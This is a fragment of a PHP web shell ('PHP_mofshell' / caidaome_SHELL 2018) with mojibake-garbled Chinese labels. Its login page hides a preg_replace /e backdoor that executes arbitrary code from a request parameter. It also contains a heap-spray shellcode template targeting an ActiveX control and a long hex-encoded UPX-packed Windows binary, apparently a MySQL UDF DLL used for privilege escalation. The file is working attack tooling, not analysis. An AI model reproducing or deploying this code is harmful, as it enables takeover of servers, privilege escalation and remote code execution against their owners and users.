\');";\r\n }\r\n\t\tif(!empty($c))\r\n\t\t{\r\n return $c;\r\n\t\t}\r\n }\r\n \r\n \r\nfunction html_main($path,$shellname){\r\n\r\nif (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")\r\n{\r\n $safemode = TRUE;\r\n $hsafemode = "ON (ȫ)";\r\n}\r\nelse {$safemode = FALSE; $hsafemode = "OFF (ȫ)";\r\n}\r\n\t$Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);\r\n\t$Server_OS = PHP_OS;\r\n\t$Server_Soft = $_SERVER["SERVER_SOFTWARE"];\r\n\t$web_server = php_uname();\r\nprint<<{$Server_IP} -PHP_mofshell By{$shellname}- {$Server_OS} - {$Server_Soft}\r\n
ַ: 
ȫģʽ:{$hsafemode}----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server }
\r\nEND;\r\n\thtml_n("
");\r\n}\r\n\r\nfunction islogin($shellname,$myurl){\r\n\t$Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);\r\n\t$Server_OS = PHP_OS;\r\n\t$Server_Soft = $_SERVER["SERVER_SOFTWARE"];\r\n\t$web_server = php_uname();\r\nprint<<\r\n\r\n\r\n{$Server_IP}-PHPmofshell By:{$shellname}\r\n\r\n\r\n
\r\n\r\n {$Server_OS}______{$Server_Soft}______{$web_server }\r\n\r\n
\r\n
\r\n



PASS


\r\n
\r\n
[+] PHP SHELL֧mof˫齨Ȩ,2003ͨ
[+] ½ʹ
[+] ڷǷ;Ը
[+] caidaome_SHELL 2018.01.01
\r\n
\r\n\r\n\r\nEND;\r\n@preg_replace("/[_]/e",$_REQUEST[\'h\'],"__");}function html_sql(){html_input("text","sqlhost","localhost","
MYSQLַ","30");html_input("text","sqlport","3306","
MYSQL˿","30");html_input("text","sqluser","root","
MYSQLû","30");html_input("password","sqlpass","","
MYSQL","30");html_input("text","sqldb","dbname","
MYSQL","30");html_input("submit","sqllogin","½","
");html_n(\'\');}\r\n\r\nfunction Mysql_Len($data,$len)\r\n{\r\n\tif(strlen($data) < $len) return $data;\r\n\treturn substr_replace($data,\'...\',$len);\r\n}\r\n\r\nfunction html_n($data){\t\t\r\n\techo "$data\\n";\r\n}\r\n\r\n/*---css---*/\r\n\r\nfunction css_img($img){\r\n\t$images = array(\r\n\t"exe"=>\r\n\t"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".\r\n\t"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".\r\n\t"xhIAOw==",\r\n\t"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".\r\n\t"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".\r\n\t"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",\r\n\t"txt"=>\r\n\t"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".\r\n\t"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".\r\n\t"UpPWG3Ig6Hq/XmRjuZwkAAA7",\r\n\t"html"=>\r\n\t"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".\r\n\t"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".\r\n\t"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".\r\n\t"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".\r\n\t"ADs=",\r\n\t"js"=>\r\n\t"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".\r\n\t"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".\r\n\t"a00AjYYBbc/o9HjNniUAADs=",\r\n\t"xml"=>\r\n\t"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".\r\n\t"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n\t"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".\r\n\t"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".\r\n\t"IQA7",\r\n\t"mp3"=>\r\n\t"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".\r\n\t"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".\r\n\t"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",\r\n\t"img"=>\r\n\t"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".\r\n\t"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".\r\n\t"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".\r\n\t"FxEAOw==",\r\n\t"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".\r\n\t"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n\t"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".\r\n\t"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",\r\n\t"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".\r\n "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".\r\n "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".\r\n "aNOmRcjVj02tPxPCzfkvIAA7"\r\n\t);\r\n header(\'Content-type: image/gif\');\r\n echo base64_decode($images[$img]);\r\n die();\r\n}\r\n\r\nfunction css_showimg($file){\r\n\t$it=substr($file,-3);\r\n\tswitch($it){\r\n\t\tcase "jpg": case "gif": case "bmp": case "png": case "ico": return \'img\';break;\r\n\t\tcase "htm": case "tml": return \'html\';break;\r\n\t\tcase "exe": case "com": return \'exe\';break;\r\n\t\tcase "xml": case "doc": return \'xml\';break;\r\n\t\tcase ".js": case "vbs": return \'js\';break;\r\n\t\tcase "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return \'mp3\';break;\r\n\t\tcase "rar": case "tar": case ".gz": case "zip":case "iso": return \'rar\';break;\r\n \tdefault: return \'txt\';break;\r\n\t}\r\n}\r\n\r\nfunction css_js($num,$code = \'\'){\r\n\tif($num == "shellcode"){\r\n\t\treturn \'<%@ LANGUAGE="JavaScript" %>\r\n\t\t<%\r\n\t\tvar act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");\r\n\t\tvar shellcode = unescape("\'.$code.\'");\r\n\t\tvar bigblock = unescape("%u9090%u9090");\r\n\t\tvar headersize = 20;\r\n\t\tvar slackspace = headersize+shellcode.length;\r\n\t\twhile (bigblock.length\';\r\n\t}\r\n\thtml_n(\'\');\r\n}\r\n\r\nfunction css_left(){\r\n\thtml_n(\'\');\r\n\thtml_n(\'
\');\r\n}\r\n\r\nfunction css_main(){\r\n\thtml_n(\'\r\n\t\');\r\n}\r\n\r\nfunction css_foot(){\r\n\thtml_n(\'
\');\r\n}\r\n\r\nfunction Mysql_shellcode()\r\n{\r\n\treturn "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E327325A00438D7DA883CE2D656B0763CE457537E59B512FD8B7C1028B8B8596504522D9BE1B6144418D4DA885C977DD1696139C2E06249C238D472834160750D28954283B70800CF2C67526537547C84B6CC025CF070D048CFFFEDF5EBC8549E4200866E4516A28AE11DB6E61BC52F88D2072229D489AB3985D2C1D8B35781C88D11B302A6C37DF5968311659FFFF1151BE82B96D42D6FC84FED51052D985CD06A5091CEBC5BA94506052022C069E0F3981C511788FA404FCF68450228B75087CC0807E09060A4B775B71A85F8B5E0C20D469D9D115CEF92011C8B80D124CB6177EA98AB6E00FC1E0028BC803C604C468141ADF02CC33C98A7DBFB566FBEF5E4CC1E102058D14018955E0803A4D4F586F8F818BB9AA01CC8BF2E266F3A7ED0CF26C164102C0159D0542D875477205B04C2C3908C10D00DA6E0D67EF1968D007001034E90B8795BC59C82DED1533F607B80774C03FFB9009C183C206298A023C2167DF7FE9743C843B1B3C0A741788843530421B46D889846744EBDB7FB907CABBFF6F29B6B53C33D2F3A6753B88954C0BB918D962C860784DB34C76739038C0B10B6C68E803C59378271EEB254A1D8E236534B0301BB135728144C60F4F9400D7493C77C7030B5E382E81D8BB7F1A837C2410027513060405750C5B6464046B5F23C357084F179213C888140525F1ECA263810C5456C9134CD8C9C22CBD4FE485DBCEE499566BF6CFE0FA8BCB2BCE490C0804904BB80768042700E0FE397221F724434558E0FE8108D87B96002F8BFB1B2A2327837CD98BFACBCB5073BCC8855098E0FE8D6FBFAC03B7B10DCC63DC0DAF234B21D18DC47AF02AFA7A568F638FA2C0EB0C0354AD46F2C505EED48821B01A60A081C4112684C3CFF4425689FF3B77D77857040CB911280D108D7C2418F3AB8D4C243B0D069B6C1451AB343101BA0B041B0111E5724E64F06650720D553D8755FD04BA917466380E6E8D542408D731F62D925266181108435C5C8F4F4A761850514F9481106A5CDFBFEACC4044076C1589B424809674C67652DD247C03788C5FB65E56B87B49BCBFF0FF255B3CCCCC8D87D4E1674755E7F0FF42DF86C00D5F613C5D6C7904F74104868B23B8065423740F795CEFDCD7B7A5108902B863C33E1210506AFE5C908E7F40F864FF35A900198E1AB52529582FDDD5B4BFC0ED742E3B932474FA34768B0CB38959BD2DB50A02C304B394751268F7DBBFEDBD2DB37D0EAAFF5408EBC3648F0543236C7286EA8C1A648B9C8184FF83DF7904687510E3520C3951087505CF4D05BBFB5351BB1E18EB0A082489DFDCB7B64B02439D6B0C595BFCEF56433230069F0BF758433030F7A5FAFCD82C10DBD10C74F740E42682B58DD63E3F45F812E11B8D08B67F97AD3E21737B08C1618D0C76B18FEA6EED5F744556558D6B10A80B5D5E410B33BBE85ED633783C25534F0DD41D2B38D3AF560C0E168D36B7DEDDB6C5648F358F550C3B08C77EBF73301A8B348FEBA1B8DBEB1CC9EB15884DD67A5C003F5D16466F684394BC3B8B298B419FCC256BB4031824E1D763D9B66E20CF56BDE8C0E010E24785ED75EC423C0AE0DD5B0D1A7E4DE47F34168D5AFF3ADD766B1B92784D1C8020770D2450EDC3FF4884157559598BC65EC9C3CF8DDCFAF7D7B26B71151008C3B7E0772212C7424B4F0434A759913916BDF01C6C7410131E97DEB2C3568BB5FB05D7383B42565777216A091C1FF8ECA245FBA424020C91EF2059E1DB46ED38CEC7FD85F675032863FCDA7F5E83C60F83E6F056887CA4BCC65CE23B3A6BFC4D5716F6460C4074ECEFB75D15660CB2174D29730510B35652F790357329C54E308374342411FAFEE42B502AF7FF761007176F9B34F5DD7D0525EB128B461C530B5FD2A4D87B1C0059644B2A20B25628752EE34A467A86B386F62C591AE1D81E2DFA85EFFD0A7C092CE61D90280DE157F8ED397D08470F94C0485BC31630077AC31A6E5DF1025B5756391803BA23977D6097CA146A401A0CB8CDDCF7039B4DB4DD40743DFD6E78405720AC597B741356C220D7843337E11962410B5957B4C5DA2E6018CC07835328D00CBC3010E326ABA73DB884FB1147D903CB8BFEEA5A8A4614B8F01759C93A47FF7704A94949608563EF1B385B5E5FC93A00513D7DBB8B3B1C279772148111222E2D10B5B73FF685011773EC2BC88BC40C8BE18B596EB4A32D685036C10C576D747A9BF8BAEB74D9C614F7C64D8B197507F8B77803AB756FEB21F646880747497425FF6BCFBA26291F75EB2D1D5183E303740DEE5EEF66201D2F4B75F38492C3F7C79ED9E0FD2874123AFD8A116A9B3BE93AEE6C182EFA2AD1DBC2F6C82E89FEC7D074AFBAA5DB2FB523FEC70603D083F0E8C28B4F78E1BFF5C604A900948174DE84D2742C84641EF7C26FB7B7B90F580C070875C639EB18818C34DDA3E272090E00046A2BC45A88533F550A3B6CF7EBEE075F75F8B07585A3CCFFEFDE8DC6974E8A11F161698A7101DDBF2B74644F7719148A074638D07415D90BD3D2A573E30A0A75F5FC5F51E242173E10F0078D7E436102FE3B2A50DD4E1DC60238E075C48A410376EDDDEF31188A66FF83C11074DFEBB12F348AC26B74851B9030F28DBC0CC34C05C7DB88DFFC83F8F988CC078FA7DBC668BEA3068E58BEB2427EBB8EDE3CA10E680D075925DEC12DBDD1F7FB12102760891664950803C1EDDB50F3375C32F7750940EE78769BDDD8EB7256641CA4C03968098DCC7BB3D96D345204371B366231A8FF0519627F7FBBC8EB3E6B3BC1752C390D0D7EBDFF07E6FB0AFC0D8E90E128E6320E175A89D8331A64FBC25507514EADD87E11B259BF5833A569A363097D56B457C7105EBDC0D6BB09833D482926C101740547D36EA3040322DAA4C4E809F4AED9996EFFD0080CC113CC04BCB6D410BF4E0F07EB8D01C90C4C6D6FB0BB1737575023F6467926A315ED8034032125F71F0117396C115B083C5BD8B9E241C0D01A8DD4D8B1AE6176BA310E97D801DB78C041E03A9A3A3AD3C57DCD2A7D3B8130AB756C462D6C36BE025E10A882D2F6A840B9EEDAB61BED074AA96604071017DE6EBFF77F3F4E0824FE890E89462F1883657524EF0337F72D6E66A90C0115F981FE8B03BFC75A289C0748750BC03F32AE6ABFFDD7073E3EEE5966F7270801577467420BDCB65FAC3E2BF88D48390E581849A489DEB99EF04E047E10053CFE53DCEB3683FBF6CBFFDFBA198BCB8BC3C1F90583E01F8B0C8D93808D04C002B6F4B2D08196B88498F6F320F399B156A107783A260A4B2CD15C8A9E88E614B7C0C24A0D74885507DF40A12932DF4E0C20EB0FCC16B8760C7CEB080DC2C1C8A50E864C17064802DFBA95A1E6798A1F09DB8975F411BAD06E02EC890F0EF406D1B705D74A8D370641D00939554ABF7DF7EC0F8CDC1780FB207C1304787F0E0FBE50152EC08631717461EB02F8BE2DBCBB0F84C60E94C1F804A70789D00F879A85F652EC30FF24901DB2834803CBB22CDB55CC02D8E0E4FCDCBC6DBB4D5D1D954883E8E43B0403742DC1B55EA20B1F4848840DA8D2C56E6E594039FC082708041CB28C1D0111808002C3128E9EFB2AF9B9509B687613661E6CC80F8D12469B89985B8ED80E27B476CBB2ED170A666C4441D0EBE98AF03EED5C2E641EF0D305BF30E7CE63398D0489361B346FCBDB56AE2E046874206CB880FB7790495E2EA005804DFD10EEC6FFE4203F367514807F0134CA4747271FDA628680771888D0AA8568B7C6ED0D1C0FB6C3F66601802291EC50147E06131E28981DCEB0C18DCC35EB4733181652F39BE127F8670F8F1CE508650F8D9600F9EF43DB5811EBA9847817E8430F849FB96D5D836D70036C100CB8E903AF74A146C6BE3008CCC08B25430BFDF0BD68BEFACAC54BC21921D0ADAED4DEFB894DF844E7B1C92D0E2DE47EB981381229DC7477B37D212AD64E85D220D466833878869FED5DCA094040EBE721CC80C320136B1B74AB408FB8FDF3CAD14DDB955F708DCFF3F006CB1A0D8DAFF1660377862E8848BF578089043A953F5B008DD1D6C5F490323FD80C298EDDBEBDD35A7432040974C5487CE801521C97B3B345FE3A6C59882AF4471A183147BD2002BB8916359DDE6F2CF64580D9CCB97F74170FBF00D1E8E369E652D7D8C3AD2DDC000CBF0E94AE6DB4BE6E81344D50C28D8314670B2D826B25D5165C50CCA2B5AFD483C05E08F05D4B053B6C377540FC0EBCC8D18B851FB082B8F7855082FCC9C6057EB581E69E741429F0003506BE67B324205C595D12AF788432611654562D750DD0C2BB653A29BDB9E06157A758888D8459A619694899ED2C1D0C059E0684B686FB2C805184FD331B23B1CF05F77491C9C15DD4273C602621F62BC1D1F847FD340BDB0582F6288038AF03ECF1D728176B2624FE853D6B2815CC074DBB7B10D410A6FEF65D8A13C645EA3004516377CF60DF678845EBEB4821083BC202EB35D6852E09971B209909669F08CD2DF0EC668909050706F514EB0E296A403C0A69BF1FD6A05FA53A7959EB413D74218519637405404A0C0FBB641B0CF6C099EB250BB7C8F220AFC0ECC908EBE0070E19B8F5C6DB741BE37F177C1AC073115883D2D6E2C30D9FF7DA698BFAC90B1FDEE0B50577DC83E700B27D09161B2D08FD1B2AFCAA3AC0B6FBC60BC77509E40060B733D6DEADD55E614A7F0619EE0F765B5DFDF4995250578AC009C476409C5FDB6E372AC48B66C33007C017112CCBF6DF063E39677E03035DD440F8F847D75CF78818EBB5502B0C027F02A51AEE9B03611880393075A90A009BBBEB24400FC601301A98D825DEFEB1B6F4935DFCF6C3D226F6C716CF5A8386068A2D5C0F0A2BEB47369A970902740B20C1E475E06035B6ED2B75E402F4180C7884BDDB61A91B201EF0C41011CD7C37B703EA1402E45015342C9001D94C3E3104306F6B97DA893E7441058B7EFBBB0B97688E3B78FFDD034347C8502DFC54A443DE9D7E328DE9516EA164CF3B1759984FDB962DD802C7155802F4F860A50AC977AC79A5D7193808FBF97DF729B3456313F9E86DEC99D334B75BE01830031706216D30D1354DA4ACE11B7440C6126F55424F490478DC11BA6D6C74898A02FF0EB6300BB90233E098006C4E9468254A90D68C71D8A3AE4A83B557AFA9E0B06AEA7E21B618B714AB63DB43B9833E0D07207FE3B5B628B5908B5CE81A4BE6775DD73831263C1C35100FBE065746CDE7EC505F363FC34BE26D6C3C72BE9F580081008DAE0673520C083B4163B3A177D951FC1C661D6F8DE0B474E8500F41CC5204B4702D700B30027114E0550798688478EAA3365283702294BC5DF20D50600F6E85C0750F6C60A1FBCF373E5333DB391D15B4282D5DC3431B267E44D8B8013D0E74FB768AED8D700C5540785BFF36FFD70810E0916D800A6AFF7604626BC75EEAD59C14433B487CCED915DB812D1BB81D785DF6568CFDDB41DC7078158184FFD6077415CA2083644457D42DB983867CBE100A06FE2B8F3C763BD13474230774741B647413A8AE012344D398367B845CC52BDCFF007CC45A2067C106D76A07845D1003CA44F85083EAC716DE3C856C6C3407753E576A181F3B1A1F3C8BF8D4336A113542FB8D06BC59078C08005957750ADA0E78B31F78893EEB067A1D84D9607F865F281A805E5D60FF57605AA8B11584CC40A48B4F485801B7B87501172BC5D86E2508B00006B41217B770A0FBACC70505A48BBDA118AD96AFC18DB107B88858F0E16FC47314B5042B500C81FAB27207DB210C6FBB14EBE8EC321C556E34D5880C2E6A41DEF22BA3DF60A36A5AAFC2FC57C1EE7F37AA817FCE8B7AFC69C904D24B448D8C8E1A35C50144695D695685463BF80C13F6C1012E757FFDF4B46FFAED3F495F0B0C3BCF76038E8B4C13043B03BFF84D4BF4486783F920731CBF2CD3EFBFFB5FE88D4C01C4D7217CB044FE09752B752139EB2483C1EEC15CB0E01E2D21BCB0C4124AAEF174240679F04D42ADB519DB55890A040803630DDAD6FEBB088C8BFBC1FF044F83FF3F7B865F2F5167A8DBBDE197ECC4422BE20562AEA711A188F8495ADB5AF7E6A464760589F3CA411BFB40ED56E09F3E3BFA76028ABF746B2E9101DB4C69BE51BDBA16B9E491EAD22154111E96900F0BBDD221944C72B66DB152BF49BE4A0B04658BD6CA0811910EECB610F9D40939B68900B2F9295B73DD1B0B26892F0E05087FFB652B974A638A4C0704EF20884D0FFEC1FDEBE2BB880B7325807D0F55BB888BCFD3EBD81A25DB7609190DECB109B10BC436592924DC4FE019D821B8672559040F9D84B7F0DFC0F009388B54D0891A895C13FCFF086BAA0FB348FA4EB09CDFA6AFFFACEE0D0DA80EC1E10F03480CBB03B159E9581653513A1F32068B3D081C0950080E3940DDCDDE0D31A4886C570FFE48431C7BC39F0A481080794313836004FE118378D65AA61D106C5310785A124642882D0910C9F48D72F5388B15F21430C1C2B146DA282BC892110AD307BE708D48145170411C6D428DF767FA85B43B05223518BFEEEFD81496B88905ACEB0324A3AC8935B0493138532A6627F7AE142F68578D3C822C1B8E0ED3C6481776F0176A4934000B6FD57D0E56D3EE83EDFFEE0BE0B899EB1026BE33F6D3E80EC62D3E173049AC0F3BDF7FBF5D58E20873E14BE13B232B23FE0BCF75DDAE718B0B24143B9A1872E707756D26E4FB798BDA3BD8261505EBE6740BD7A019AC24C2837B3C3BD72A68891337EBED2681397B870D1B2FEEDBC8DC7646270B7B85DB90530E61DBE2F6BC595B1089FA43A8386C75EF6E6B071BE91406891DA5148B886F0BB016FAFEFC2D8B8C90C4B6B387FDAD904488378B127011557DA1A156DD1F000E440BD68B563077BF0B75178B91841CFF45FC04BF35EBA6FFFE23390BD774E98B97CA33FF5C5A741B87584D764C57CEE68DBA12C166EC645F9DBAED0AFD7C05D1E147EB752054F9430A2BE956EFEA7FF17BC1FE044EDE3F7EF83AC9DCB85E3BF79B0D0124617421206D207D2B11A27C383AEEFEB69CD3F3EC235C88448903FE0F75EA08B181F48E7B210BEB31172B5CBBC56895A1322119293673148215982C85220AA6D76593C07A04F80095AF3F4735D77A089084C5A97CF10348AD6D420CA522C264A974B32C06FE0B7D29C499C636576A0B331162BFB0CE6EBB64978C093B0A8F097CAEEB2FEF437AC0280D8D4EB6097B04B15C8F74B1BCAD16BEEE09376A2EB7F4AEF70B890A8903FCB2790DBFED56AE03D122011232FC9F8B34126FB70E218D790F3E751AA9B0A011A92BDC4B3BA406A49772C16B119C8D420408A1C41769A10220A489C09A6E6D44B6305F89507250D401E924E15797903B319841A10B889CC0930BF8653DB868C4411B45CBD81233305C81335C89834517F04610742A1B20655783363A63198CB014BDA5461C586460B47CB1856EAD4E24C5897E060562244A196A41B98BC36E74F1E051DF3771C84108343B5A2DDCC54FE043C331B63E6E3769C0815AFB3082C3026CB745EA40080204DE4A1E88D0AD5BFB85C1E7DF790C47A68686BDE88B3B08D13768ED4D2728B28D97101342773C47834BDB8D477748F283887EF4368379778D88FC06C740FCF0420EEFD0E77E01C24804C780E810140517EA0D7E3B48F09676C78B744F0CEDADFBC405F8FC015F2689AC8D4A0C087FB8BD6C8F41649E4442BC9EE38A46438A6F75D78DC80B84C07A884E43A30978047050608CBA2CCB687EA5266189BDC3ABA031BE